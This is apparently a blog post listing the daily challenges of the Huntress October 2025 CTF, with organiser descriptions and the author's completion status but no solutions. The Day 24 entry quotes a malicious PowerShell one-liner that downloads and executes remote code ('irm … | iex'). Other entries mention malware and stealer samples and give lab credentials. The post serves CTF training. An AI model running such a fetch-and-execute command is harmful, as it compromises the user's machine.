Intro

Partaking in the annual tradition of turning October into the Cyber(security) Awareness Month (beware of acronyms!), Huntress organised a month-long [CTF challenge][ctf], releasing a (or multiple) new challenge(s) every day.

The challenges covered a wide range of types and difficulty levels, allowing both newcomers to enjoy solving a few challenges as well as giving experienced players a hard time every now and then.

I collected all my CTF notes in a GitHub repository. That should make it easier to follow what my process(?) looked like, or at least kind of.

Sadly, I didn’t manage to complete all challenges, which does mean I won’t have I write-up for all 31 days worth of challenges. For that, I refer you to the write-ups of other participants and/or the challenge owners.

Below is a list of all the CTF challenges together with their category and description. I’ve marked which ones I’ve (partially) completed. The notes themselves can be found on GitHub.

Day 01

Read the Rules - COMPLETED

Please follow the rules for the Huntress CTF!

Read the rules at https://ctf.huntress.com/rules

If you look closely, you can find a flag!

Technical Support - COMPLETED

Want to join the party of GIFs, memes and emoji shenanigans? Or just want to ask a question for technical support regarding any challenges in the CTF? Be sure to join the Huntress CTF Discord server.

This CTF uses support tickets within Discord to help handle requests.

If you need assistance, please create a ticket with the #ctf-open-ticket channel. You do not need to direct message any CTF organizers or facilitators, they will just tell you to open a ticket. You might find a flag in the ticket channel, though!

Join the Discord!

Spam test - COMPLETED

Time to do some careful Googling… what’s the MD5 hash of the Generic Test for Unsolicited Bulk Email (GTUBE) string?

Submit the hash wrapped within the flag{ prefix and } suffix to match the standard flag format.

Cover All Your Bases - COMPLETED

Can you make sense of all the different data below? Each one has a different representation!

Uncover the appropriate plaintext and submit the flags below! Do you know what all these ones and zeros mean?

Binary

Can you make sense of all the different data below? Each one has a different representation!

Uncover the appropriate plaintext and submit the flags below! Do you know what all these ones and zeros mean?

Octal

Hmmm, a group of triplets, it looks like. Can you find out what they are trying to say?

Decimal

These numbers look familiar… but how could they be represented as text?

Hexadecimal

These look like pairs! But these have weird letters in them?

Base32

Uppercase letters and digits in a long stream…. notice anything about the padding?

Base45

A mixed alphabet with symbols. What is this one supposed to be?

Base64

Compact and common on the wire… does the ending give you a clue?

Base85

This variant often shows special markers. See anything bracketing the data?

Base92

This noisy alphabet is picky about whitespace… formatting might matter!

Base65536

The data below looks super weird! Don’t panic if your editor can’t render every symbol. Can you tell what it is?

Just a Little Bit - COMPLETED

If just a little bit were to go missing… would it really even matter?

QRception - COMPLETED

Wow, that’s a big QR code! I wonder what it says!

RFC 9309 - COMPLETED

Sorry. You know every CTF has to have it. 🤷

Verify You Are Human - COMPLETED

My computer said I needed to update MS Teams, so that is what I have been trying to do…

…but I can’t seem to get past this CAPTCHA!

CAUTION This is the Malware category. Please be sure to approach this challenge material within an isolated virtual machine.

NOTE Some components of this challenge may be finicky with the browser-based connection. You can still achieve what you need to, but there may be some more extra steps than if you were to approach this over the VPN.

(i.e., “remove the port” when you need to… you’ll know what I mean 😜)

Day 02

OFA - COMPLETED

Two factors? In this economy??!!

Spaghetti - COMPLETED

You know, I’ve been thinking… at the end of the day, spaghetti is really just strings of pasta!

Anyway, we saw this weird file running on startup. Can you figure out what this is?

I’m sure you’ll get more understanding of the questions below as you explore!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

IMPORTANT

The ZIP archive password is infected.

NOTE

You may find a public paste URL that is expired. This is an artifact of the original malware sample and is intentional. This URL is not necessary for the challenge.

MainFileSettings

Uncover the flag within the “main file.”

NOTE

Once you uncover the intended payload, you shouldn’t need to do any further analysis. Use context clues from the challenge description and you should find the flag.

My Fourth Oasis

Uncover the flag within “my fourth oasis.”

MEMEMAN

Uncover the flag beside “MEMEMAN.”

Day 03

Maximum Sound - NOT FOUND

Dang, this track really hits the target! It sure does get loud though, headphone users be warned!!

SANDY - PARTIALLY

My friend Sandy is really into cryptocurrencies! She’s been trying to get me into it too, so she showed me a lot of Chrome extensions I could add to manage my wallets. Once I got everything sent up, she gave me this cool program!

She says it adds better protection so my wallets can’t get messed with by hackers.

Sandy wouldn’t lie to me, would she…? Sandy is the best!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

The password to the archive is infected.

Day 04

ARIKA - COMPLETED

The Arika ransomware group likes to look slick and spiffy with their cool green-on-black terminal style website… but it sounds like they are worried about some security concerns of their own!

NOTE

The password for the ZIP archive below is arika.

Snooze - COMPLETED

Don’t bug me, I’m sleeping! Zzzz… zzz… zzzz….

Uncover the flag from the file presented.

Day 05

Sigma Linter - PARTIALLY

Oh wow, another web app interface for command-line tools that already exist!

This one seems a little busted, though…

Days 06

Emotional - COMPLETED

Don’t be shy, show your emotions! Get emotional if you have to! Uncover the flag.

Day 07

Trust Me - COMPLETED

C’mon bro, trust me! Just trust me!! Trust me bro!!!

The TrustMe.exe program on this Windows desktop “doesn’t trust me?”

It says it will give me the flag, but only if I “have the permissions of Trusted Installer”…?

If you are using the VPN, you can RDP to this challenge with:

Username: Administrator Password: h$4#82PSK0BUBaf7

NOTE

This virtual machine does not have Internet access.

Day 08

Flag Checker - COMPLETED

We’ve decided to make this challenge really straight forward. All you have to do is find out the flag!

Juuuust make sure not to trip any of the security controls implemented to stop brute force attacks…

NOTE

Working this challenge may be difficult with the browser-based connection alone. We again recommend you use the direct IP address over the VPN connection.

IMPORTANT

Restarting the instance repeatedly is not required for solving this challenge. If you find yourself doing this, it may be worth reevaluating your strategy.

Day 09

Tabby’s Date

Ohhhh, Tab, Tab, Tab…. what has she done.

My friend Tabby just got a new laptop and she’s been using it to take notes. She says she puts her whole life on there!

She was so excited to finally have a date with a boy she liked, but she completely forgot the details of where and when. She told me she remembers writing it in a note… but she doesn’t think she saved it!!

She shared with us an export of her laptop files.

NOTE

The password to the ZIP archive is tabbys_date.

Can you help us find the details of Tab’s date?

Day 10

For Greatness

Oh great, another phishing kit. This has some functionality to even send stolen data over email! Can you track down the email address they send things to?

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

The password to the archive is infected. Uncover the flag from the file provided.

Day 11

Trashcan

Have you ever done forensics on the Recycle Bin? It’s… a bit of a mess. Looks like the threat actor pulled some tricks to hide data here though.

The metadata might not be what it should be. Can you find a flag?

Day 12

Angler - PARTIALLY

These scribbles are impossible to read!

42 6c 6f 77 66 69 73 68

Some crazy fisherman came by, dropped this note, and was muttering something in his drunken stupor, about his fishing pole and taking out… murlocs in Entra? and CyberChef!?

I don’t get it. You’re the expert here! Not me!

WARNING

This challenge is designed for you to have a look around using enumeration tooling and emphasises thinking “outside the box”, versus challenging your ability to ‘pwn’ the tenant. Please do not sabotage the challenge!

MFA is intended for this challenge. If you cannot sign in, try a different way.

This challenge uses flags that are not in the standard format of flag{[MD5HASH]}. You will find flags with the flag{ prefix and } suffix, but a short alphanumeric string with some special characters wrapped inside the curly braces.

What is the FINAL flag? This flag is unlike the others and ends with a ? character.

NOTE

This challenge also includes some “bonus flags” along the way that are still worth some points.

• Submit the bonus flag that ends with the character 2.
• Submit the bonus flag that ends with the character d.
• Submit the bonus flag that ends with the character a.
• Submit the bonus flag that ends with the character m.
• Submit the bonus flag that ends with the character c.

Day 13

I Forgot

So…. bad news.

We got hit with ransomware.

And… worse news… we paid the ransom.

After the breach we FINALLY set up some sort of backup solution… it’s not that good, but, it might save our bacon… because my VM crashed while I was trying to decrypt everything.

And perhaps the worst news… I forgot the decryption key.

Gosh, I have such bad memory!!

CAUTION

⚠️ This file was produced from a fresh Windows installation. Included within that are some antivirus signature strings and artifacts that may include profanity or unsettling language. Please be advised these remnants exist, but they are not part of the challenge.

NOTE

The archive password is i_forgot.

Day 14

Beyblade

Sheesh! Some threat actor sure did let it rip on this host! We’ve been able to uncover a file that may help with incident response.

NOTE

The password to the ZIP archive is beyblade. This challenge has the flag MD5 hash value separated into chunks. You must uncover all of the different pieces and put them together with the flag{ and } suffix to submit.

Day 15

Phasing Through Printers

I found this printer on the network, and it seems to be running… a weird web page… to search for drivers?

Here is some of the code I could dig up.

NOTE

Escalate your privileges and uncover the flag in the root user’s home directory.

IMPORTANT

The password to the ZIP archive below is phasing_through_printers.

Day 16

Threat Actor Support Line

You’ve heard of RaaS, you’ve heard of SaaS… the Threat Actor Support Line brings the two together!

Upload the files you want encrypted, and the service will start up its own hacker computer (as the Administrator user with antivirus disabled, of course) and encrypt them for you!

WARNING

Some players have reported that while researching material that might help them with this challenge, they have discovered some public malicious Github repositories that embed malware under the guise of a tool or utility. These are external to the Huntress CTF, and while there is always potential for malware in outside/untrusted software, please exercise caution if you explore unknown third-party resources.

Day 17

vx-underground

vx-underground, widely known across social media for hosting the largest collection and library of cat pictures, has been plagued since the dawn of time by people asking: “what’s the password?”

Today, we ask the same question. We believe there are secrets shared amongst the cat pictures… but perhaps these also lead to just more cats.

Uncover the flag from the file provided.

Day 18

Bussing Around

One of the engineers noticed that an HMI was going haywire.

He took a packet capture of some of the traffic but he can’t make any sense of it… it just looks like gibberish!

For some reason, some of the traffic seems to be coming from someone’s computer. Can you help us figure out what’s going on?

Day 19

XMDR

We had a lot of fun helping the Internet understand what MDRs are, but we thought of the next the best thing: why not have you use one! 😄

A host that you protect had some strange alerts fire off… can you analyze and triage to find other malicious activity?

Day 20

Darcy - COMPLETED

Darcy has apparently been having a lot of fun with a unique version control system.

She told me she hid a flag somewhere with her new tool and wants me to find it… I can’t make any sense of it, can you?

Day 21

Follow The Money - COMPLETED

Hey Support Team,

We had a bit of an issue yesterday that I need you to look into ASAP. There’s been a possible case of money fraud involving our client, Harbor Line Bank. They handle a lot of transfers for real estate down payments, but the most recent one doesn’t appear to have gone through correctly.

Here’s the deal, we need to figure out what happened and where the money might have gone. The titling company is looping in their incident response firm to investigate from their end. I need you to quietly review things on our end and see what you can find. Keep it discreet and be passive.

I let Evelyn over at Harbor Line know that someone from our team might reach out. Her main email is offline right now just in case it was compromised, she’s using a temporary address until things get sorted out:

evelyn.carter@51tjxh.onmicrosoft.com

IMPORTANT

This challenge uses a non-standard flag format.

NOTE

The password to the ZIP archive below is follow_the_money.

Day 22

NimCrackMe1

I just really like Nim, okay, I think it’s neat.

(Could very well be used by threat actors too, so it’s worth getting a feel for some Nimlang reverse engineering!)

Webshellz

The sysadmin reported that some unexpected files were being uploaded to the file system of their IIS servers.

As a security analyst, you have been tasked with reviewing the Sysmon, HTTP, and network traffic logs to help us identify the flags!

NOTE

The password to the ZIP archive is webshellz

Day 23

Rust Tickler

Ooooh Rust! AND tickles? Rusty tickles…?

Day 24

Lizard. - COMPLETED

Erm, what the sigma?

We saw this strange PowerShell string on one of our hosts, can you investigate and figure out what this does?

irm biglizardlover.com/gecko | iex

CAUTION

This is the Malware category, and as such, includes malware.

Please be sure to analyze these files within an isolated virtual machine.

Day 25

My Hawaii Vacation

Oh jeeeez… I was on Booking.com trying to reserve my Hawaii vacation.

Once I tried verifying my ID, suddenly I got all these emails saying that my password was changed for a ton of different websites!! What is happening!?!

I had a flag.txt on my desktop, but that’s probably not important…

Anyway, I still can’t even finish booking my flight to Hawaii!! Here is the site I was on… can you get this thing to work!??!

CAUTION

This is the Malware category, and as such, includes malware. Please be sure to analyze these files within an isolated virtual machine.

Day 26

Puzzle Pieces Redux - COMPLETED

Well, I accidentally put my important data into a bunch of executables… just don’t ask, okay?

It was fine… until my cat Sasha stepped on my keyboard and messed everything up! OH NOoOoO00!!!!!111

Can you help me recover my important data?

Day 27

Follow The Money: The Sequel - COMPLETED

WARNING

The initial Follow the Money challenge should be completed first before this challenge.

Hey Support Team,

Thanks for your help the other day! After seeing the way you handled yourself and gathered these details, I wanted to see if I could get a bit more help from you. I know you found their username the other day. See what you can do with that. I need you to find the town that this hacker lives in. I don’t think the IR firm is doing enough. I want to have every piece of information we can find. Maybe we can pay a visit. Let me know what you find. Thanks!

IMPORTANT

This challenge DOES NOT require you to contact any businesses. This can be fully solved with publicly available information. Being that this is OSINT and public-facing, please DO NOT do anything to disrupt other CTF players or others that are not involved with the CTF.

IMPORTANT

This challenge uses a non-standard flag format.

Day 28

Rust Tickler 2

You all looked like you were having so much fun reverse engineering Rust code… why not do it again!?

Telestealer

Our threat intelligence team reported that Ben’s data is actively being sold on the dark web. During the incident response, the SOC identified a suspicious JavaScript file within Ben’s Downloads folder.

Can you recover the stolen data?

NOTE

The password to the ZIP archive is telestealer

Day 29

Trapped

Well… I’m trapped. Feels like I’m in jail. Can you get the flag?

NOTE

The flag is in the root directory at /flag.txt

CAUTION

This challenge intentionally has no browser-based connection. You must use the VPN connection to access this challenge, listening on port 9999. Please use the challenge IP address as the host to connect to with netcat.

nc $CHALLENGE_IP_ADDRESS 9999

Day 30

Rust Tickler 3

It’s back. Good luck.

No Limits

Even when you only have a few options, don’t let anything hold you back!

NOTE

The flag is in the root directory at /flag.txt

CAUTION

This challenge intentionally has no browser-based connection. You must use the VPN connection to access this challenge, listening on port 9999. Please use the challenge IP address as the host to connect to.

nc $CHALLENGE_IP_ADDRESS 9999

Day 31

Root Canal

But what is the real root of the issue?

If you are using the VPN, you can SSH in to this challenge with:

Username: ctf
Password: HuntressCTF2025